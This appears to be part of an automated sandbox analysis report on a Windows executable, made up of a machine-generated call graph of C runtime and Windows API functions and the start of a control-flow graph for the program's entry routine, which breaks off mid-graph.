19830->19804 19834 7ff6fb2018fb 19833->19834 19836 7ff6fb201952 19834->19836 19837 7ff6fb1fa534 50 API calls 19834->19837 19836->19804 19838 7ff6fb20193c 19837->19838 19839 7ff6fb2015d4 65 API calls 19838->19839 19839->19836 19841 7ff6fb1f4178 45 API calls 19840->19841 19842 7ff6fb2012e8 19841->19842 19843 7ff6fb2012f4 GetOEMCP 19842->19843 19844 7ff6fb201306 19842->19844 19846 7ff6fb20131b 19843->19846 19845 7ff6fb20130b GetACP 19844->19845 19844->19846 19845->19846 19846->19807 19846->19808 19848 7ff6fb2012d4 47 API calls 19847->19848 19849 7ff6fb2019a9 19848->19849 19850 7ff6fb201aff 19849->19850 19851 7ff6fb2019e6 IsValidCodePage 19849->19851 19857 7ff6fb201a00 memcpy_s 19849->19857 19852 7ff6fb1eb870 _log10_special 8 API calls 19850->19852 19851->19850 19853 7ff6fb2019f7 19851->19853 19854 7ff6fb201741 19852->19854 19855 7ff6fb201a26 GetCPInfo 19853->19855 19853->19857 19854->19815 19854->19820 19855->19850 19855->19857 19874 7ff6fb2013ec 19857->19874 19930 7ff6fb1ff5e8 EnterCriticalSection 19858->19930 19875 7ff6fb201429 GetCPInfo 19874->19875 19876 7ff6fb20151f 19874->19876 19875->19876 19881 7ff6fb20143c 19875->19881 19877 7ff6fb1eb870 _log10_special 8 API calls 19876->19877 19879 7ff6fb2015be 19877->19879 19878 7ff6fb202150 48 API calls 19880 7ff6fb2014b3 19878->19880 19879->19850 19885 7ff6fb206e94 19880->19885 19881->19878 19884 7ff6fb206e94 54 API calls 19884->19876 19886 7ff6fb1f4178 45 API calls 19885->19886 19887 7ff6fb206eb9 19886->19887 19890 7ff6fb206b60 19887->19890 19891 7ff6fb206ba1 19890->19891 19892 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19891->19892 19896 7ff6fb206beb 19892->19896 19893 7ff6fb206e69 19894 7ff6fb1eb870 _log10_special 8 API calls 19893->19894 19895 7ff6fb2014e6 19894->19895 19895->19884 19896->19893 19897 7ff6fb1fc90c _fread_nolock 12 API calls 19896->19897 19898 7ff6fb206d21 19896->19898 19899 7ff6fb206c23 19896->19899 19897->19899 19898->19893 19900 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19898->19900 19899->19898 19901 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19899->19901 19900->19893 19902 7ff6fb206c96 19901->19902 19902->19898 19921 7ff6fb1fe3f4 19902->19921 19905 7ff6fb206d32 19908 7ff6fb1fc90c _fread_nolock 12 API calls 19905->19908 19909 7ff6fb206e04 19905->19909 19911 7ff6fb206d50 19905->19911 19906 7ff6fb206ce1 19906->19898 19907 7ff6fb1fe3f4 __crtLCMapStringW 6 API calls 19906->19907 19907->19898 19908->19911 19909->19898 19910 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19909->19910 19910->19898 19911->19898 19912 7ff6fb1fe3f4 __crtLCMapStringW 6 API calls 19911->19912 19913 7ff6fb206dd0 19912->19913 19913->19909 19914 7ff6fb206df0 19913->19914 19915 7ff6fb206e06 19913->19915 19916 7ff6fb1ffaf8 WideCharToMultiByte 19914->19916 19917 7ff6fb1ffaf8 WideCharToMultiByte 19915->19917 19918 7ff6fb206dfe 19916->19918 19917->19918 19918->19909 19919 7ff6fb206e1e 19918->19919 19919->19898 19920 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19919->19920 19920->19898 19922 7ff6fb1fe020 __crtLCMapStringW 5 API calls 19921->19922 19923 7ff6fb1fe432 19922->19923 19926 7ff6fb1fe43a 19923->19926 19927 7ff6fb1fe4e0 19923->19927 19925 7ff6fb1fe4a3 LCMapStringW 19925->19926 19926->19898 19926->19905 19926->19906 19928 7ff6fb1fe020 __crtLCMapStringW 5 API calls 19927->19928 19929 7ff6fb1fe50e __crtLCMapStringW 19928->19929 19929->19925 19932 7ff6fb2055d1 19931->19932 19933 7ff6fb2055e8 19931->19933 19934 7ff6fb1f43f4 _get_daylight 11 API calls 19932->19934 19933->19932 19935 7ff6fb2055f6 19933->19935 19936 7ff6fb2055d6 19934->19936 19938 7ff6fb1f4178 45 API calls 19935->19938 19939 7ff6fb2055e1 19935->19939 19937 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19936->19937 19937->19939 19938->19939 19939->19613 19941 7ff6fb1f4178 45 API calls 19940->19941 19942 7ff6fb208281 19941->19942 19945 7ff6fb207ed8 19942->19945 19948 7ff6fb207f26 19945->19948 19946 7ff6fb1eb870 _log10_special 8 API calls 19947 7ff6fb206515 19946->19947 19947->19613 19947->19640 19949 7ff6fb207fad 19948->19949 19951 7ff6fb207f98 GetCPInfo 19948->19951 19954 7ff6fb207fb1 19948->19954 19950 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19949->19950 19949->19954 19952 7ff6fb208045 19950->19952 19951->19949 19951->19954 19953 7ff6fb1fc90c _fread_nolock 12 API calls 19952->19953 19952->19954 19955 7ff6fb20807c 19952->19955 19953->19955 19954->19946 19955->19954 19956 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19955->19956 19957 7ff6fb2080ea 19956->19957 19958 7ff6fb2081cc 19957->19958 19959 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19957->19959 19958->19954 19960 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19958->19960 19961 7ff6fb208110 19959->19961 19960->19954 19961->19958 19962 7ff6fb1fc90c _fread_nolock 12 API calls 19961->19962 19963 7ff6fb20813d 19961->19963 19962->19963 19963->19958 19964 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 19963->19964 19965 7ff6fb2081b4 19964->19965 19966 7ff6fb2081ba 19965->19966 19967 7ff6fb2081d4 19965->19967 19966->19958 19970 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19966->19970 19974 7ff6fb1fe278 19967->19974 19970->19958 19971 7ff6fb208213 19971->19954 19973 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19971->19973 19972 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19972->19971 19973->19954 19975 7ff6fb1fe020 __crtLCMapStringW 5 API calls 19974->19975 19976 7ff6fb1fe2b6 19975->19976 19977 7ff6fb1fe2be 19976->19977 19978 7ff6fb1fe4e0 __crtLCMapStringW 5 API calls 19976->19978 19977->19971 19977->19972 19979 7ff6fb1fe327 CompareStringW 19978->19979 19979->19977 19981 7ff6fb206f51 19980->19981 19982 7ff6fb206f6a HeapSize 19980->19982 19983 7ff6fb1f43f4 _get_daylight 11 API calls 19981->19983 19984 7ff6fb206f56 19983->19984 19985 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19984->19985 19986 7ff6fb206f61 19985->19986 19986->19644 19988 7ff6fb206fa3 19987->19988 19989 7ff6fb206f99 19987->19989 19991 7ff6fb206fa8 19988->19991 19997 7ff6fb206faf _get_daylight 19988->19997 19990 7ff6fb1fc90c _fread_nolock 12 API calls 19989->19990 19995 7ff6fb206fa1 19990->19995 19992 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19991->19992 19992->19995 19993 7ff6fb206fb5 19996 7ff6fb1f43f4 _get_daylight 11 API calls 19993->19996 19994 7ff6fb206fe2 HeapReAlloc 19994->19995 19994->19997 19995->19649 19996->19995 19997->19993 19997->19994 19998 7ff6fb2028a0 _get_daylight 2 API calls 19997->19998 19998->19997 20000 7ff6fb1fe020 __crtLCMapStringW 5 API calls 19999->20000 20001 7ff6fb1fe254 20000->20001 20001->19653 20003 7ff6fb1f480a 20002->20003 20004 7ff6fb1f47e6 20002->20004 20005 7ff6fb1f4864 20003->20005 20006 7ff6fb1f480f 20003->20006 20008 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20004->20008 20012 7ff6fb1f47f5 20004->20012 20007 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 20005->20007 20009 7ff6fb1f4824 20006->20009 20006->20012 20013 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20006->20013 20018 7ff6fb1f4880 20007->20018 20008->20012 20010 7ff6fb1fc90c _fread_nolock 12 API calls 20009->20010 20010->20012 20011 7ff6fb1f4887 GetLastError 20014 7ff6fb1f4368 _fread_nolock 11 API calls 20011->20014 20012->19657 20012->19658 20013->20009 20017 7ff6fb1f4894 20014->20017 20015 7ff6fb1f48c2 20015->20012 20016 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 20015->20016 20022 7ff6fb1f4906 20016->20022 20023 7ff6fb1f43f4 _get_daylight 11 API calls 20017->20023 20018->20011 20018->20015 20019 7ff6fb1f48b5 20018->20019 20020 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20018->20020 20021 7ff6fb1fc90c _fread_nolock 12 API calls 20019->20021 20020->20019 20021->20015 20022->20011 20022->20012 20023->20012 20025 7ff6fb1f853d 20024->20025 20032 7ff6fb1f8539 20024->20032 20045 7ff6fb201d4c GetEnvironmentStringsW 20025->20045 20028 7ff6fb1f854a 20030 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20028->20030 20029 7ff6fb1f8556 20052 7ff6fb1f86a4 20029->20052 20030->20032 20032->19688 20037 7ff6fb1f88e4 20032->20037 20034 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20035 7ff6fb1f857d 20034->20035 20036 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20035->20036 20036->20032 20038 7ff6fb1f8907 20037->20038 20043 7ff6fb1f891e 20037->20043 20038->19688 20039 7ff6fb1febb0 MultiByteToWideChar _fread_nolock 20039->20043 20040 7ff6fb1fdea8 _get_daylight 11 API calls 20040->20043 20041 7ff6fb1f8992 20042 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20041->20042 20042->20038 20043->20038 20043->20039 20043->20040 20043->20041 20044 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20043->20044 20044->20043 20046 7ff6fb1f8542 20045->20046 20047 7ff6fb201d70 20045->20047 20046->20028 20046->20029 20048 7ff6fb1fc90c _fread_nolock 12 API calls 20047->20048 20049 7ff6fb201da7 memcpy_s 20048->20049 20050 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20049->20050 20051 7ff6fb201dc7 FreeEnvironmentStringsW 20050->20051 20051->20046 20053 7ff6fb1f86cc 20052->20053 20054 7ff6fb1fdea8 _get_daylight 11 API calls 20053->20054 20067 7ff6fb1f8707 20054->20067 20055 7ff6fb1f870f 20056 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20055->20056 20057 7ff6fb1f855e 20056->20057 20057->20034 20058 7ff6fb1f8789 20059 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20058->20059 20059->20057 20060 7ff6fb1fdea8 _get_daylight 11 API calls 20060->20067 20061 7ff6fb1f8778 20062 7ff6fb1f87c0 11 API calls 20061->20062 20064 7ff6fb1f8780 20062->20064 20063 7ff6fb1ff784 37 API calls 20063->20067 20065 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20064->20065 20065->20055 20066 7ff6fb1f87ac 20068 7ff6fb1f9c10 _isindst 17 API calls 20066->20068 20067->20055 20067->20058 20067->20060 20067->20061 20067->20063 20067->20066 20069 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20067->20069 20070 7ff6fb1f87be 20068->20070 20069->20067 20073 7ff6fb207e41 __crtLCMapStringW 20071->20073 20072 7ff6fb2063fe 20072->19712 20072->19713 20073->20072 20074 7ff6fb1fe278 6 API calls 20073->20074 20074->20072 20075 7ff6fb209ef3 20076 7ff6fb209f03 20075->20076 20079 7ff6fb1f4788 LeaveCriticalSection 20076->20079 18685 7ff6fb1ebe70 18686 7ff6fb1ebe80 18685->18686 18702 7ff6fb1f8ec0 18686->18702 18688 7ff6fb1ebe8c 18708 7ff6fb1ec168 18688->18708 18690 7ff6fb1ebea4 _RTC_Initialize 18700 7ff6fb1ebef9 18690->18700 18713 7ff6fb1ec318 18690->18713 18691 7ff6fb1ec44c 7 API calls 18692 7ff6fb1ebf25 18691->18692 18694 7ff6fb1ebeb9 18716 7ff6fb1f832c 18694->18716 18700->18691 18701 7ff6fb1ebf15 18700->18701 18703 7ff6fb1f8ed1 18702->18703 18704 7ff6fb1f43f4 _get_daylight 11 API calls 18703->18704 18705 7ff6fb1f8ed9 18703->18705 18706 7ff6fb1f8ee8 18704->18706 18705->18688 18707 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18706->18707 18707->18705 18709 7ff6fb1ec179 18708->18709 18712 7ff6fb1ec17e __scrt_acquire_startup_lock 18708->18712 18710 7ff6fb1ec44c 7 API calls 18709->18710 18709->18712 18711 7ff6fb1ec1f2 18710->18711 18712->18690 18741 7ff6fb1ec2dc 18713->18741 18715 7ff6fb1ec321 18715->18694 18717 7ff6fb1f834c 18716->18717 18718 7ff6fb1ebec5 18716->18718 18719 7ff6fb1f8354 18717->18719 18720 7ff6fb1f836a GetModuleFileNameW 18717->18720 18718->18700 18740 7ff6fb1ec3ec InitializeSListHead 18718->18740 18721 7ff6fb1f43f4 _get_daylight 11 API calls 18719->18721 18724 7ff6fb1f8395 18720->18724 18722 7ff6fb1f8359 18721->18722 18723 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18722->18723 18723->18718 18756 7ff6fb1f82cc 18724->18756 18727 7ff6fb1f83dd 18728 7ff6fb1f43f4 _get_daylight 11 API calls 18727->18728 18729 7ff6fb1f83e2 18728->18729 18730 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18729->18730 18730->18718 18731 7ff6fb1f83f5 18732 7ff6fb1f8417 18731->18732 18734 7ff6fb1f8443 18731->18734 18735 7ff6fb1f845c 18731->18735 18733 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18732->18733 18733->18718 18736 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18734->18736 18737 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18735->18737 18738 7ff6fb1f844c 18736->18738 18737->18732 18739 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18738->18739 18739->18718 18742 7ff6fb1ec2f6 18741->18742 18744 7ff6fb1ec2ef 18741->18744 18745 7ff6fb1f94fc 18742->18745 18744->18715 18748 7ff6fb1f9138 18745->18748 18755 7ff6fb1ff5e8 EnterCriticalSection 18748->18755 18757 7ff6fb1f82e4 18756->18757 18761 7ff6fb1f831c 18756->18761 18758 7ff6fb1fdea8 _get_daylight 11 API calls 18757->18758 18757->18761 18759 7ff6fb1f8312 18758->18759 18760 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18759->18760 18760->18761 18761->18727 18761->18731 20083 7ff6fb2009c0 20094 7ff6fb2066f4 20083->20094 20095 7ff6fb206701 20094->20095 20096 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20095->20096 20097 7ff6fb20671d 20095->20097 20096->20095 20098 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20097->20098 20099 7ff6fb2009c9 20097->20099 20098->20097 20100 7ff6fb1ff5e8 EnterCriticalSection 20099->20100 18462 7ff6fb1f4938 18463 7ff6fb1f4952 18462->18463 18464 7ff6fb1f496f 18462->18464 18466 7ff6fb1f43d4 _fread_nolock 11 API calls 18463->18466 18464->18463 18465 7ff6fb1f4982 CreateFileW 18464->18465 18467 7ff6fb1f49ec 18465->18467 18468 7ff6fb1f49b6 18465->18468 18469 7ff6fb1f4957 18466->18469 18513 7ff6fb1f4f14 18467->18513 18487 7ff6fb1f4a8c GetFileType 18468->18487 18472 7ff6fb1f43f4 _get_daylight 11 API calls 18469->18472 18475 7ff6fb1f495f 18472->18475 18480 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18475->18480 18476 7ff6fb1f49e1 CloseHandle 18482 7ff6fb1f496a 18476->18482 18477 7ff6fb1f49cb CloseHandle 18477->18482 18478 7ff6fb1f49f5 18483 7ff6fb1f4368 _fread_nolock 11 API calls 18478->18483 18479 7ff6fb1f4a20 18534 7ff6fb1f4cd4 18479->18534 18480->18482 18486 7ff6fb1f49ff 18483->18486 18486->18482 18488 7ff6fb1f4ada 18487->18488 18489 7ff6fb1f4b97 18487->18489 18490 7ff6fb1f4b06 GetFileInformationByHandle 18488->18490 18493 7ff6fb1f4e10 21 API calls 18488->18493 18491 7ff6fb1f4bc1 18489->18491 18492 7ff6fb1f4b9f 18489->18492 18494 7ff6fb1f4bb2 GetLastError 18490->18494 18495 7ff6fb1f4b2f 18490->18495 18497 7ff6fb1f4be4 PeekNamedPipe 18491->18497 18512 7ff6fb1f4b82 18491->18512 18492->18494 18496 7ff6fb1f4ba3 18492->18496 18498 7ff6fb1f4af4 18493->18498 18501 7ff6fb1f4368 _fread_nolock 11 API calls 18494->18501 18499 7ff6fb1f4cd4 51 API calls 18495->18499 18500 7ff6fb1f43f4 _get_daylight 11 API calls 18496->18500 18497->18512 18498->18490 18498->18512 18503 7ff6fb1f4b3a 18499->18503 18500->18512 18501->18512 18502 7ff6fb1eb870 _log10_special 8 API calls 18504 7ff6fb1f49c4 18502->18504 18551 7ff6fb1f4c34 18503->18551 18504->18476 18504->18477 18507 7ff6fb1f4c34 10 API calls 18508 7ff6fb1f4b59 18507->18508 18509 7ff6fb1f4c34 10 API calls 18508->18509 18510 7ff6fb1f4b6a 18509->18510 18511 7ff6fb1f43f4 _get_daylight 11 API calls 18510->18511 18510->18512 18511->18512 18512->18502 18514 7ff6fb1f4f4a 18513->18514 18515 7ff6fb1f43f4 _get_daylight 11 API calls 18514->18515 18533 7ff6fb1f4fe2 __std_exception_destroy 18514->18533 18517 7ff6fb1f4f5c 18515->18517 18516 7ff6fb1eb870 _log10_special 8 API calls 18518 7ff6fb1f49f1 18516->18518 18519 7ff6fb1f43f4 _get_daylight 11 API calls 18517->18519 18518->18478 18518->18479 18520 7ff6fb1f4f64 18519->18520 18521 7ff6fb1f7118 45 API calls 18520->18521 18522 7ff6fb1f4f79 18521->18522 18523 7ff6fb1f4f81 18522->18523 18524 7ff6fb1f4f8b 18522->18524 18525 7ff6fb1f43f4 _get_daylight 11 API calls 18523->18525 18526 7ff6fb1f43f4 _get_daylight 11 API calls 18524->18526 18530 7ff6fb1f4f86 18525->18530 18527 7ff6fb1f4f90 18526->18527 18528 7ff6fb1f43f4 _get_daylight 11 API calls 18527->18528 18527->18533 18529 7ff6fb1f4f9a 18528->18529 18531 7ff6fb1f7118 45 API calls 18529->18531 18532 7ff6fb1f4fd4 GetDriveTypeW 18530->18532 18530->18533 18531->18530 18532->18533 18533->18516 18535 7ff6fb1f4cfc 18534->18535 18543 7ff6fb1f4a2d 18535->18543 18558 7ff6fb1fea34 18535->18558 18537 7ff6fb1f4d90 18538 7ff6fb1fea34 51 API calls 18537->18538 18537->18543 18539 7ff6fb1f4da3 18538->18539 18540 7ff6fb1fea34 51 API calls 18539->18540 18539->18543 18541 7ff6fb1f4db6 18540->18541 18542 7ff6fb1fea34 51 API calls 18541->18542 18541->18543 18542->18543 18544 7ff6fb1f4e10 18543->18544 18545 7ff6fb1f4e2a 18544->18545 18546 7ff6fb1f4e61 18545->18546 18547 7ff6fb1f4e3a 18545->18547 18548 7ff6fb1fe8c8 21 API calls 18546->18548 18549 7ff6fb1f4368 _fread_nolock 11 API calls 18547->18549 18550 7ff6fb1f4e4a 18547->18550 18548->18550 18549->18550 18550->18486 18552 7ff6fb1f4c50 18551->18552 18553 7ff6fb1f4c5d FileTimeToSystemTime 18551->18553 18552->18553 18555 7ff6fb1f4c58 18552->18555 18554 7ff6fb1f4c71 SystemTimeToTzSpecificLocalTime 18553->18554 18553->18555 18554->18555 18556 7ff6fb1eb870 _log10_special 8 API calls 18555->18556 18557 7ff6fb1f4b49 18556->18557 18557->18507 18559 7ff6fb1fea41 18558->18559 18560 7ff6fb1fea65 18558->18560 18559->18560 18561 7ff6fb1fea46 18559->18561 18563 7ff6fb1fea9f 18560->18563 18566 7ff6fb1feabe 18560->18566 18562 7ff6fb1f43f4 _get_daylight 11 API calls 18561->18562 18564 7ff6fb1fea4b 18562->18564 18565 7ff6fb1f43f4 _get_daylight 11 API calls 18563->18565 18568 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18564->18568 18569 7ff6fb1feaa4 18565->18569 18567 7ff6fb1f4178 45 API calls 18566->18567 18570 7ff6fb1feacb 18567->18570 18571 7ff6fb1fea56 18568->18571 18572 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18569->18572 18573 7ff6fb1feaaf 18570->18573 18574 7ff6fb1ff7ec 51 API calls 18570->18574 18571->18537 18572->18573 18573->18537 18574->18570 20157 7ff6fb1f4720 20158 7ff6fb1f472b 20157->20158 20166 7ff6fb1fe5b4 20158->20166 20179 7ff6fb1ff5e8 EnterCriticalSection 20166->20179 18924 7ff6fb1fec9c 18925 7ff6fb1fee8e 18924->18925 18927 7ff6fb1fecde _isindst 18924->18927 18926 7ff6fb1f43f4 _get_daylight 11 API calls 18925->18926 18944 7ff6fb1fee7e 18926->18944 18927->18925 18930 7ff6fb1fed5e _isindst 18927->18930 18928 7ff6fb1eb870 _log10_special 8 API calls 18929 7ff6fb1feea9 18928->18929 18945 7ff6fb2054a4 18930->18945 18935 7ff6fb1feeba 18936 7ff6fb1f9c10 _isindst 17 API calls 18935->18936 18938 7ff6fb1feece 18936->18938 18942 7ff6fb1fedbb 18942->18944 18969 7ff6fb2054e8 18942->18969 18944->18928 18946 7ff6fb2054b3 18945->18946 18949 7ff6fb1fed7c 18945->18949 18976 7ff6fb1ff5e8 EnterCriticalSection 18946->18976 18951 7ff6fb2048a8 18949->18951 18952 7ff6fb2048b1 18951->18952 18953 7ff6fb1fed91 18951->18953 18954 7ff6fb1f43f4 _get_daylight 11 API calls 18952->18954 18953->18935 18957 7ff6fb2048d8 18953->18957 18955 7ff6fb2048b6 18954->18955 18956 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18955->18956 18956->18953 18958 7ff6fb2048e1 18957->18958 18959 7ff6fb1feda2 18957->18959 18960 7ff6fb1f43f4 _get_daylight 11 API calls 18958->18960 18959->18935 18963 7ff6fb204908 18959->18963 18961 7ff6fb2048e6 18960->18961 18962 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18961->18962 18962->18959 18964 7ff6fb204911 18963->18964 18965 7ff6fb1fedb3 18963->18965 18966 7ff6fb1f43f4 _get_daylight 11 API calls 18964->18966 18965->18935 18965->18942 18967 7ff6fb204916 18966->18967 18968 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18967->18968 18968->18965 18977 7ff6fb1ff5e8 EnterCriticalSection 18969->18977 20184 7ff6fb1fb830 20195 7ff6fb1ff5e8 EnterCriticalSection 20184->20195 20303 7ff6fb20a10e 20304 7ff6fb20a127 20303->20304 20305 7ff6fb20a11d 20303->20305 20307 7ff6fb1ff648 LeaveCriticalSection 20305->20307 18575 7ff6fb1f8c79 18576 7ff6fb1f96e8 45 API calls 18575->18576 18577 7ff6fb1f8c7e 18576->18577 18578 7ff6fb1f8ca5 GetModuleHandleW 18577->18578 18579 7ff6fb1f8cef 18577->18579 18578->18579 18585 7ff6fb1f8cb2 18578->18585 18587 7ff6fb1f8b7c 18579->18587 18585->18579 18601 7ff6fb1f8da0 GetModuleHandleExW 18585->18601 18607 7ff6fb1ff5e8 EnterCriticalSection 18587->18607 18602 7ff6fb1f8dd4 GetProcAddress 18601->18602 18603 7ff6fb1f8dfd 18601->18603 18606 7ff6fb1f8de6 18602->18606 18604 7ff6fb1f8e02 FreeLibrary 18603->18604 18605 7ff6fb1f8e09 18603->18605 18604->18605 18605->18579 18606->18603 19317 7ff6fb20a079 19320 7ff6fb1f4788 LeaveCriticalSection 19317->19320

                                                              Executed Functions

                                                              Function 00007FF6FB1E1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7ff6fb1e1000-7ff6fb1e3536 call 7ff6fb1ef138 call 7ff6fb1ef140 call 7ff6fb1ebb70 call 7ff6fb1f4700 call 7ff6fb1f4794 call 7ff6fb1e33e0 14 7ff6fb1e3544-7ff6fb1e3566 call 7ff6fb1e18f0 0->14 15 7ff6fb1e3538-7ff6fb1e353f 0->15 21 7ff6fb1e356c-7ff6fb1e3583 call 7ff6fb1e1bf0 14->21 22 7ff6fb1e3736-7ff6fb1e374c call 7ff6fb1e3f70 14->22 16 7ff6fb1e371a-7ff6fb1e3735 call 7ff6fb1eb870 15->16 25 7ff6fb1e3588-7ff6fb1e35c1 21->25 29 7ff6fb1e3785-7ff6fb1e379a call 7ff6fb1e25f0 22->29 30 7ff6fb1e374e-7ff6fb1e377b call 7ff6fb1e76a0 22->30 27 7ff6fb1e3653-7ff6fb1e366d call 7ff6fb1e7e10 25->27 28 7ff6fb1e35c7-7ff6fb1e35cb 25->28 42 7ff6fb1e3695-7ff6fb1e369c 27->42 43 7ff6fb1e366f-7ff6fb1e3675 27->43 32 7ff6fb1e35cd-7ff6fb1e35e5 call 7ff6fb1f4560 28->32 33 7ff6fb1e3638-7ff6fb1e364d call 7ff6fb1e18e0 28->33 45 7ff6fb1e3712 29->45 46 7ff6fb1e379f-7ff6fb1e37be call 7ff6fb1e1bf0 30->46 47 7ff6fb1e377d-7ff6fb1e3780 call 7ff6fb1ef36c 30->47 51 7ff6fb1e35f2-7ff6fb1e360a call 7ff6fb1f4560 32->51 52 7ff6fb1e35e7-7ff6fb1e35eb 32->52 33->27 33->28 54 7ff6fb1e36a2-7ff6fb1e36c0 call 7ff6fb1e7e10 call 7ff6fb1e7f80 42->54 55 7ff6fb1e3844-7ff6fb1e3863 call 7ff6fb1e3e90 42->55 49 7ff6fb1e3682-7ff6fb1e3690 call 7ff6fb1f415c 43->49 50 7ff6fb1e3677-7ff6fb1e3680 43->50 45->16 61 7ff6fb1e37c1-7ff6fb1e37ca 46->61 47->29 49->42 50->49 66 7ff6fb1e360c-7ff6fb1e3610 51->66 67 7ff6fb1e3617-7ff6fb1e362f call 7ff6fb1f4560 51->67 52->51 80 7ff6fb1e380f-7ff6fb1e381e call 7ff6fb1e8400 54->80 81 7ff6fb1e36c6-7ff6fb1e36c9 54->81 69 7ff6fb1e3865-7ff6fb1e386f call 7ff6fb1e3fe0 55->69 70 7ff6fb1e3871-7ff6fb1e3882 call 7ff6fb1e1bf0 55->70 61->61 65 7ff6fb1e37cc-7ff6fb1e37e9 call 7ff6fb1e18f0 61->65 65->25 84 7ff6fb1e37ef-7ff6fb1e3800 call 7ff6fb1e25f0 65->84 66->67 67->33 85 7ff6fb1e3631 67->85 77 7ff6fb1e3887-7ff6fb1e38a1 call 7ff6fb1e86b0 69->77 70->77 94 7ff6fb1e38a3 77->94 95 7ff6fb1e38af-7ff6fb1e38c1 SetDllDirectoryW 77->95 92 7ff6fb1e3820 80->92 93 7ff6fb1e382c-7ff6fb1e382f call 7ff6fb1e7c40 80->93 81->80 86 7ff6fb1e36cf-7ff6fb1e36f6 call 7ff6fb1e1bf0 81->86 84->45 85->33 97 7ff6fb1e3805-7ff6fb1e380d call 7ff6fb1f415c 86->97 98 7ff6fb1e36fc-7ff6fb1e3703 call 7ff6fb1e25f0 86->98 92->93 103 7ff6fb1e3834-7ff6fb1e3836 93->103 94->95 100 7ff6fb1e38c3-7ff6fb1e38ca 95->100 101 7ff6fb1e38d0-7ff6fb1e38ec call 7ff6fb1e6560 call 7ff6fb1e6b00 95->101 97->77 108 7ff6fb1e3708-7ff6fb1e370a 98->108 100->101 104 7ff6fb1e3a50-7ff6fb1e3a58 100->104 118 7ff6fb1e38ee-7ff6fb1e38f4 101->118 119 7ff6fb1e3947-7ff6fb1e394a call 7ff6fb1e6510 101->119 103->77 111 7ff6fb1e3838 103->111 109 7ff6fb1e3a5a-7ff6fb1e3a77 PostMessageW GetMessageW 104->109 110 7ff6fb1e3a7d-7ff6fb1e3aaf call 7ff6fb1e33d0 call 7ff6fb1e3080 call 7ff6fb1e33a0 call 7ff6fb1e6780 call 7ff6fb1e6510 104->110 108->45 109->110 111->55 120 7ff6fb1e390e-7ff6fb1e3918 call 7ff6fb1e6970 118->120 121 7ff6fb1e38f6-7ff6fb1e3903 call 7ff6fb1e65a0 118->121 125 7ff6fb1e394f-7ff6fb1e3956 119->125 134 7ff6fb1e3923-7ff6fb1e3931 call 7ff6fb1e6cd0 120->134 135 7ff6fb1e391a-7ff6fb1e3921 120->135 121->120 132 7ff6fb1e3905-7ff6fb1e390c 121->132 125->104 129 7ff6fb1e395c-7ff6fb1e3966 call 7ff6fb1e30e0 125->129 129->108 142 7ff6fb1e396c-7ff6fb1e3980 call 7ff6fb1e83e0 129->142 137 7ff6fb1e393a-7ff6fb1e3942 call 7ff6fb1e2870 call 7ff6fb1e6780 132->137 134->125 147 7ff6fb1e3933 134->147 135->137 137->119 151 7ff6fb1e3982-7ff6fb1e399f PostMessageW GetMessageW 142->151 152 7ff6fb1e39a5-7ff6fb1e39e1 call 7ff6fb1e7f20 call 7ff6fb1e7fc0 call 